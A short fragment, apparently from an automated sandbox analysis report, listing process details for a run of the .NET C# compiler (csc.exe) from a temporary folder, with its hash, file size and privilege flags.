                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Disassembly

                  Code Analysis

                  Reset < >